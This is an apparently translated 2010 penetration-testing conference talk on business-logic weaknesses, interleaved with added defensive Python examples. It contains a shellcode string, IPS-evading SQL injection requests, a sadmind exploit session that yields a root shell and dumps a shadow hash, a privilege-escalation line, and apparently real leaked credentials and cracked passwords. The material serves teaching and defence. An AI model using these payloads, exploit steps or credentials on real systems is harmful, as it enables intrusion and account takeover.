\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded
Matteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org
0wning the Business, Reloaded - SMAU2010 - Milano, 22 October 2010 - Matteo Falsetti
Who I am
independent researcher for more than fifteen years
for ten years I have been doing penetration testing and vulnerability assessment
witness to the birth of the sikurezza.org project
I do not (yet) deal only with business logic
Agenda
security, history and parallels
penetration test, more than ten years ago
penetration test, today
business vulnerabilities - case history
A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescence of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim...
1993, Improving the Security of Your Site by Breaking Into it
However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here.
1993, Dan Farmer and Wietse Venema
security, history and parallels (3)
1983, Wargames
1988, Internet Worm
1990, Hacker Crackdown
The 1993 paper reflects a reality that was by then evident, but the techniques it describes are still simplistic; one has to wait until 1995 for Mudge's paper on overflows
security, history and parallels (4)
1985, Morris
1989, Bellovin
1994 Takedown, '95 Joncheray, '96 RFC1948
2001, strange attractors
the end of the '90s shows a decisive qualitative leap in attack and defence techniques, independent publications, tools and exploits...
security, history and parallels (5)
10 - 12 years for mainstream use of b0f
15 years before the first systematic protection methods appear
10 years for the first stands against weak ISN generation
20 years to mitigate (not solve) the TCP spoofing problem
security, history and parallels (6)
incident / paper
torpor
patch / new trends / new incidents
Ring a bell?
security, history and parallels (6)
(diagram: cycle of discovery, patch release / announcement, patch installation)
penetration test, more than ten years ago
simple perimeter(?!) infrastructures
few and well-known daemon implementations
few papers, fewer tools, practically no online professional community
systems compromised with the usual methods
penetration test, more than ten years ago (2)
password guessing
passwd theft
NFS/NIS/Telnet/FTP
world wide web? gopher and veronica, thank you
before long the arrival of Windows on the network would start the SMB/CIFS dance
1997, in Phrack #51 fyodor presents nmap
penetration test, more than ten years ago (3)
no canvas, no core impact, no metasploit, no... practically nothing ;-p
exploits were all-important, the difference between a PT with and without concrete results
almost total absence of specific skills for Win32 systems
the tester's personal knowledge base makes the difference
1998, nessus is born
penetration test, more than ten years ago (4)
0-days are rare
0-days are private (up to a point)
0-days are extremely valuable
even known exploits are rare, especially if
multi-platform, multi-architecture, multi-target
working :-p
penetration test, more than ten years ago (5)
(chart with legend: password, exploit, NFS/NIS, other)
penetration test, today
the network is the computer? no, the web
http and xml, the new esperanto
everything is a web application
penetration test, today (2)
deployment in distributed clusters
complex perimeter scenarios
virtualisation and cloud computing
heterogeneous clients
penetration test, today (3)
heavyweight exploits no longer exist
iis, apache, ssh?
"a remote in ssh is a dead dream" (anonymous)
if they did exist they would not be sold to the usual commercial suspects (or would they?!)
penetration test, today (4)
today exploits are needed less (with due exceptions)
tools like metasploit make creating attack code enormously easier
pts call for something else:
physical security
client-side logic
knowledge of the target environment, its infrastructure, its technologies
penetration test, today (5)
pts are often
under-estimated ("better a classic assessment")
not understood ("do what you have to, but don't touch anything, don't copy or modify any data, don't impersonate other users' accounts, don't increase the load on the machine, don't...")
crippled by extraneous corporate logic ("ok for systems A, C and D. Not B, because it belongs to the operations and systems line, which reports to X. Systems E to H we don't test because we couldn't reach the internal contact Y.")
business vulnerabilities - case history
simple vulnerabilities:
configuration errors
logic and design errors
oversights, things forgotten
often more effective than any exploit
the problem is human (all the more so as the company grows, along with its policies, its reporting lines, the friction between middle managers/executives, ...)
business vulnerabilities - case history
Totti
multi-user and single-user, to me they're the same
the six-zero appliance
chained exploit, lotek edition
business vulnerabilities - case history
Totti
wmilan abc123 totti
marco9 alice1 pippo321
gandalf slamdunk Amore71
password mare19 GretA
fragolin Andrea63 mundogol
R0m4n0 capitan0 Madonna
C0ns0l3 redwine lucillA
sesso69 OKpassw wlafranc
scout441 pooh123 falcao82
rospomo Gelato!! malta99
testtest abcabc19 amendola
Adolfo65 cambiami TmP1234
business vulnerabilities - case history
10 years of passwords
(chart with legend: dictionary, brute force 3 days, not obtained, brute force 3 days)
business vulnerabilities - case history
Totti
on average 5% - 10% of accounts have a password equal (or similar) to the username
every company has a password policy, few policies are accepted by employees, very few are secure
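Added example, not part of the talk: a Python password-policy check for the weakness quantified above (password equal or similar to the username) and for the placeholder patterns visible in the cracked list. The account list is constructed and every password in it is invented for the example.

```python
"""Audit a credential list for passwords equal or similar to the username, plus the
placeholder / test / sequence patterns that show up in real cracked lists.
Input shape: (username, password) pairs, as a cracking tool or a policy hook at
password-change time would hand them over."""
import re

# Constructed sample accounts; usernames and passwords are made up for this example.
SAMPLE_ACCOUNTS = [
    ("wmilan", "wmilan"),        # equal to username
    ("totti", "T0tti10"),        # leet-speak username plus digits
    ("marco9", "marco9!"),       # username plus one symbol
    ("gandalf", "fladnag"),      # reversed username
    ("pippo", "Gelato!!"),       # unrelated to the username, passes
    ("rossi", "cambiami"),       # "change me": a placeholder never changed
    ("bianchi", "testtest"),     # test string
    ("verdi", "abc123"),         # keyboard / sequence run
    ("neri", "R0m4n0!!"),        # unrelated to the username, passes
]

LEET = str.maketrans("013457@$!", "oleastasi")
PLACEHOLDER_WORDS = {"password", "cambiami", "test", "testtest", "changeme", "welcome"}
SEQUENCE_RUNS = ("abc", "123", "qwerty", "asdf")


def normalize(s: str) -> str:
    """Lower-case, undo common leet substitutions, keep letters only."""
    return re.sub(r"[^a-z]", "", s.lower().translate(LEET))


def similarity_findings(username: str, password: str) -> list:
    """Return the policy findings for one account (an empty list means it passes)."""
    findings = []
    u, p = normalize(username), normalize(password)
    if password.lower() == username.lower():
        findings.append("equals username")
    elif u and u in p:
        findings.append("contains username")
    elif u and u[::-1] in p:
        findings.append("contains reversed username")
    if p in PLACEHOLDER_WORDS or password.lower() in PLACEHOLDER_WORDS:
        findings.append("placeholder word")
    if any(run in password.lower() for run in SEQUENCE_RUNS):
        findings.append("keyboard/sequence run")
    if len(password) < 8:
        findings.append("shorter than 8 characters")
    return findings


def audit(accounts):
    """Audit every account; return (findings per account, share of weak accounts)."""
    report = {user: similarity_findings(user, pw) for user, pw in accounts}
    weak = sum(1 for f in report.values() if f)
    return report, weak / len(accounts)


if __name__ == "__main__":
    report, ratio = audit(SAMPLE_ACCOUNTS)
    for user, findings in report.items():
        print(f"{user:10} {'; '.join(findings) or 'ok'}")
    print(f"weak accounts: {ratio:.0%}")
```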
business vulnerabilities - case history
multi-user and single-user, to me they're the same
in theory a production system is cleaner and more controlled than the deployment environment
in practice, test replicas often do not exist and developers work directly in production environments
business vulnerabilities - case history
multi-user and single-user, to me they're the same
years of single-user home systems have produced a generation of single-users careless about file-system privileges
credentials and/or sensitive information in test batch files
files readable by anyone
no privilege separation
nagios: /opt/bea/wls93jdk/domains/XYZ/DEPLOYMENT> more init.cfg
[Server]
Hostname=srv_VIP_bldn7.xyz.org
ip=www.xxx.yyy.zzz
[Domain]
env=prod
domain=XYZ
suff_instance=wls
range_instance=01,02,03,admin
range_port=7001,7022,7003,9001
[Credential]
username=system
password=bmX@Bea_aDmin
(falsema) /opt/home/oracle/DBA/PROD_SRV > more cr_public_db.sql
create public database link PPL_PROD.ACME.ORG connect to PPL_RO identified by aqw23nm45 using 'PPL_PROD';
(falsema) /opt/home/oracle/DBA/PROD_SRV/PPL > grep identified *
arch: identified by ACME06AQUA
arch: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE "OPSPPL"
arch: IDENTIFIED BY "ACME2006P" DEFAULT TABLESPACE "USERZ"
cr_db_link.sql: identified by ACME06AQUA
cr_role_ppl_ro.sql: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE "OPSPPL"
cr_user_ppl_ro.sql: IDENTIFIED BY "IRP2006P" DEFAULT TABLESPACE "USERZ"
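Added example, not from the talk: a Python scan for the two defects shown together in the init.cfg and DBA-script sessions and named on the multi-user/single-user slide, cleartext credentials in configuration and SQL files, and files readable by any local user. File names follow the slides; the file contents, credential values and permission modes are constructed for the example, and the report masks every secret so it can be circulated.

```python
"""Find cleartext credentials in a directory tree and flag the files that are also
world-readable. Writes constructed sample files into a temporary directory first."""
import os
import re
import stat
import tempfile

# Formats seen in the case history: INI-style "password=..." and Oracle
# "IDENTIFIED BY ..." (bare or double-quoted value).
CREDENTIAL_PATTERNS = [
    re.compile(r"^\s*password\s*=\s*(?P<secret>\S+)", re.I),
    re.compile(r"identified\s+by\s+\"?(?P<secret>[^\s\";]+)\"?", re.I),
]

# Constructed sample files (all values invented): a deployment init.cfg and a DBA
# script directory with a link-creation and a user-creation script.
SAMPLE_FILES = {
    "DEPLOYMENT/init.cfg": (
        "[Server]\nHostname=srv_VIP_example.org\n"
        "[Credential]\nusername=system\npassword=EXAMPLE_admin_pw\n"
    ),
    "DBA/PROD_SRV/cr_public_db.sql": (
        "create public database link PPL_PROD.EXAMPLE.ORG connect to PPL_RO "
        "identified by EXAMPLE_link_pw using 'PPL_PROD';\n"
    ),
    "DBA/PROD_SRV/PPL/cr_user_ppl_ro.sql": (
        'CREATE USER PPL_RO IDENTIFIED BY "EXAMPLE_user_pw" DEFAULT TABLESPACE "USERZ";\n'
    ),
    "DBA/PROD_SRV/PPL/README": "No secrets here, only a note.\n",
}
SAMPLE_MODES = {
    "DEPLOYMENT/init.cfg": 0o644,                   # world-readable: the slide's case
    "DBA/PROD_SRV/cr_public_db.sql": 0o600,          # owner-only, secret still in clear
    "DBA/PROD_SRV/PPL/cr_user_ppl_ro.sql": 0o664,    # world-readable
    "DBA/PROD_SRV/PPL/README": 0o644,
}


def mask(secret: str) -> str:
    """Keep two characters so an admin can recognise the value, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_file(path: str):
    """Return one finding dict per line of `path` that carries a cleartext credential."""
    world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for pattern in CREDENTIAL_PATTERNS:
                m = pattern.search(line)
                if m:
                    findings.append({"path": path, "line": lineno,
                                     "secret": mask(m.group("secret")),
                                     "world_readable": world_readable})
                    break  # one finding per line is enough
    return findings


def scan_tree(root: str):
    """Walk `root`; return findings with world-readable secrets first, then by path."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            findings.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: (not f["world_readable"], f["path"]))


def build_sample_tree() -> str:
    """Write the constructed files with their modes; return the temporary root."""
    root = tempfile.mkdtemp(prefix="secretscan_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.chmod(path, SAMPLE_MODES[rel])  # chmod ignores the umask
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        flag = "WORLD-READABLE" if f["world_readable"] else "owner-only"
        print(f"{flag:15} {f['path']}:{f['line']} secret={f['secret']}")
```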
business vulnerabilities - case history
(screenshot: list of visible wireless network SSIDs)
business vulnerabilities - case history
the six-zero appliance
application FW/IDS
large company
1 million EUR project to protect and archive the operations of n critical databases
strict AAA policies towards the appliance and the DBs
password policy
access policy
business vulnerabilities - case history
the six-zero appliance
two different operating modes:
active (inspect & forward)
passive (sniffer/IDS)
extensive logging of SQL traffic
high throughput
this depends on a precise choice made by the appliance developers about its datagram sniffing capability
business vulnerabilities - case history
the six-zero appliance
(diagram: packet as IP > TCP > SQL, payload SELECT SYSDATE FROM DUAL)
business vulnerabilities - case history
the six-zero appliance
(diagram: packet as IP > TCP > SQL, payload DROP TABLE XYZ)
business vulnerabilities - case history
the six-zero appliance
IP Fragmentation
(diagram: IP fragment > TCP fragment > SQL, payload DROP TABLE XYZ)
business vulnerabilities - case history
the six-zero appliance
TCP Splicing
(diagram: DROP TABLE XYZ spread over several TCP segments, "D R O P", "T", "A B L E", "X Y", "Z")
business vulnerabilities - case history
the six-zero appliance
0-day technique?! Not exactly.
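Added example, not from the talk: Python showing why an inspector that matches on single datagrams misses the spliced DROP TABLE, and what a detector has to do instead, rebuild the byte stream by offset before matching, holding flows with gaps and flagging overlapping copies that disagree. The reassembler is offset-based, so it serves both the IP Fragmentation and the TCP Splicing slides; the segments and their sequence numbers are constructed.

```python
"""Per-datagram matching versus reassemble-then-match for a spliced SQL statement."""
import re

# Patterns an SQL-level IDS would look for; case-insensitive, whitespace-tolerant.
SQL_RULES = {
    "drop_table": re.compile(rb"\bDROP\s+TABLE\s+\w+", re.I),
    "create_table": re.compile(rb"\bCREATE\s+TABLE\s+\w+", re.I),
}

# Constructed capture: "DROP TABLE XYZ" spliced over five segments, delivered out of
# order, with one retransmission that overlaps an earlier segment and adds the tail.
# Offsets are relative to the start of the stream (byte 0 = 'D').
SPLICED_SEGMENTS = [
    (0, b"DROP"),
    (11, b"XY"),      # arrives before the middle of the statement
    (4, b" T"),
    (6, b"ABLE "),
    (11, b"XYZ"),     # retransmission overlapping (11, b"XY"), plus the final 'Z'
]


def match_per_segment(segments):
    """Naive inspector: apply the rules to each segment payload in isolation."""
    hits = set()
    for _, payload in segments:
        for name, rule in SQL_RULES.items():
            if rule.search(payload):
                hits.add(name)
    return hits


def reassemble(segments):
    """Rebuild the contiguous byte stream from (offset, payload) pairs.

    Returns (data, complete, ambiguous): `data` stops at the first gap; `complete` is
    False when a gap was found (hold the flow rather than pass it); `ambiguous` is
    True when two copies of the same offset carried different bytes, which a
    detector should treat as suspicious rather than silently resolve.
    """
    buf = {}
    ambiguous = False
    for offset, payload in segments:
        for i, byte in enumerate(payload):
            pos = offset + i
            if pos in buf and buf[pos] != byte:
                ambiguous = True
            buf.setdefault(pos, byte)  # first copy wins on overlap
    out = bytearray()
    pos = 0
    while pos in buf:
        out.append(buf[pos])
        pos += 1
    return bytes(out), len(out) == len(buf), ambiguous


def match_reassembled(segments):
    """Inspector that reassembles first; returns (hits, complete, ambiguous)."""
    data, complete, ambiguous = reassemble(segments)
    hits = {name for name, rule in SQL_RULES.items() if rule.search(data)}
    return hits, complete, ambiguous


if __name__ == "__main__":
    print("per-segment:", match_per_segment(SPLICED_SEGMENTS) or "no match")
    hits, complete, ambiguous = match_reassembled(SPLICED_SEGMENTS)
    print("reassembled:", hits, "complete" if complete else "gap",
          "ambiguous" if ambiguous else "consistent")
```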
business vulnerabilities - case history
the six-zero appliance
application IPS
large company
all web applications are protected by the appliance
three tier architecture
business vulnerabilities - case history
the six-zero appliance
web application assessment
XSS and SQL Injection practically impossible
the IPS filters and/or blocks every malicious input
it logs every identified transaction
business vulnerabilities - case history
the six-zero appliance
(diagram: packet as IP > TCP > HTTP, payload:)
GET /brandprofile/vulnus.aspx?xyz=XYZ%27%3B%20CREATE%20TABL%20sqlmapoutput(data%20varchar(8000))%3B--%20AND%20%27PLyKB%27=%27PLyKB HTTP/1.1
business vulnerabilities - case history
the six-zero appliance
(diagram: packet as IP > TCP > HTTP, payload:)
GET /brandprofile/vulnus.aspx?foo=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&xyz=XYZ%27%3B%20CREATE%20TABLE%20sqlmapoutput%28data%20varchar%288000%29%29%3B--%20AND%20%27PLyKB%27=%27PLyKB HTTP/1.1
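Added example, not from the talk: a Python request inspector for the padded request above. The weak version looks only at the first 2 KB of the raw query string (the inspection-window behaviour the padding relies on, assumed here for illustration); the defender's version parses the request line, percent-decodes every parameter in full and applies the rules to each value wherever it sits, and separately flags the oversized filler. The request lines are rebuilt from the slide with constructed padding.

```python
"""Truncated-window inspection versus per-parameter, fully decoded inspection."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Injection signatures for this page's payload: stacked DDL after a quote-break,
# a SQL comment tail, and the 'x'='x tautology sqlmap appends.
SQLI_RULES = {
    "stacked_ddl": re.compile(r";\s*(create|drop|alter)\s+table\b", re.I),
    "comment_tail": re.compile(r"--\s*$|--\s+and\b", re.I),
    "quote_tautology": re.compile(r"'\w+'\s*=\s*'\w+", re.I),
}
PADDING_RUN = re.compile(r"(.)\1{63,}")  # one character repeated 64+ times

# The injected value from the slide, still percent-encoded as sent on the wire.
PAYLOAD = ("XYZ%27%3B%20CREATE%20TABLE%20sqlmapoutput%28data%20varchar%288000%29%29"
           "%3B--%20AND%20%27PLyKB%27=%27PLyKB")
# Constructed request lines: the bare injection, and the same injection pushed past
# the first 2 KB of the query string by a throw-away padded parameter.
PLAIN_REQUEST = f"GET /brandprofile/vulnus.aspx?xyz={PAYLOAD} HTTP/1.1"
PADDED_REQUEST = f"GET /brandprofile/vulnus.aspx?foo={'a' * 2500}&xyz={PAYLOAD} HTTP/1.1"


def parse_request_line(line: str):
    """Split 'METHOD target HTTP/x.y' into (method, path, params); params is a list
    of (name, value) pairs with every value fully percent-decoded."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    return method, parts.path, params


def inspect_truncated(line: str, window: int = 2048):
    """Weak inspector (assumed behaviour): decode and match only the first `window`
    bytes of the raw query string. Padding pushes the payload out of the window."""
    query = urlsplit(line.split(" ", 2)[1]).query[:window]
    decoded = unquote(query)
    return {name for name, rule in SQLI_RULES.items() if rule.search(decoded)}


def inspect_request(line: str):
    """Defender's inspector: every parameter, fully decoded, wherever it sits.
    Returns ({param_name: [matched rule names]}, padding_seen)."""
    _, _, params = parse_request_line(line)
    findings, padded = {}, False
    for name, value in params:
        if PADDING_RUN.search(value):
            padded = True  # oversized filler is itself worth logging
        hits = [rule for rule, rx in SQLI_RULES.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings, padded


if __name__ == "__main__":
    for label, req in (("plain", PLAIN_REQUEST), ("padded", PADDED_REQUEST)):
        print(f"{label:7} truncated: {inspect_truncated(req) or 'no match'}")
        print(f"{label:7} full     : {inspect_request(req)}")
```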
business vulnerabilities - case history
chained exploit, lotek edition
Windows domain
DC1 and DC2, AD1 and AD2, 150 workstations
textbook patch level
complex credentials and account lock-out
business vulnerabilities - case history
chained exploit, lotek edition
(diagram: attack chain, Password Guessing > SADMIND Exploit > Srv Enable > ... > 0wned Domain!)
SADMIND Exploit:
docfuz@giringiro $ perl ~/xpl/sadmind.pl w.x.y.z
holygrail2 vs. SunOS 5.9 sadmind
by kcope in 2008
binds a shell to port 5555
docfuz@giringiro $ nc w.x.y.z 5555
id
uid=0(root) gid=0(root)
grep root /etc/shadow
root:mfK7894OhtMoO:12458::::::
Local Privilege Escalation:
echo "falsema ADMIN=ALL JBP=ALL" >> /nbudb/openv/java/auth.conf
Netbackup Administration
Software Leech:
Windows 2003 server R2 32bit edition
Netbackup 5.1 install + patch
Win2003 VM, AD half restore
Win2003 VM, AD half restore:
restore of the backup AD server
driver reinstallation
service installation in the registry
creation of a domain account
(diagram: full attack chain, Password Guessing > SADMIND Exploit > Srv Enable > Local Privilege Escalation > Netbackup Administration > Software Leech > Win2003 VM, AD half restore > AD corruption > 0wned Domain!)
business vulnerabilities - considerations
(chart: vulnerability classes 10 years ago vs today: misconfiguration / hardening, client-side logic, web input validation, buffer overflow)
business vulnerabilities - considerations
external pt:
web applications
proprietary (about 4 out of 5)
misconfigurations
passwords
no more NFS/NIS/FTP/SMB/CIFS
internal pt:
passwords
problems arising from the logical management of IT resources
heterogeneity of architectures / platforms
complexity of policy management
different org charts, different responsibilities
the images from the Dilbert comic strip and from the Metasploit project belong to their respective authors
Questions?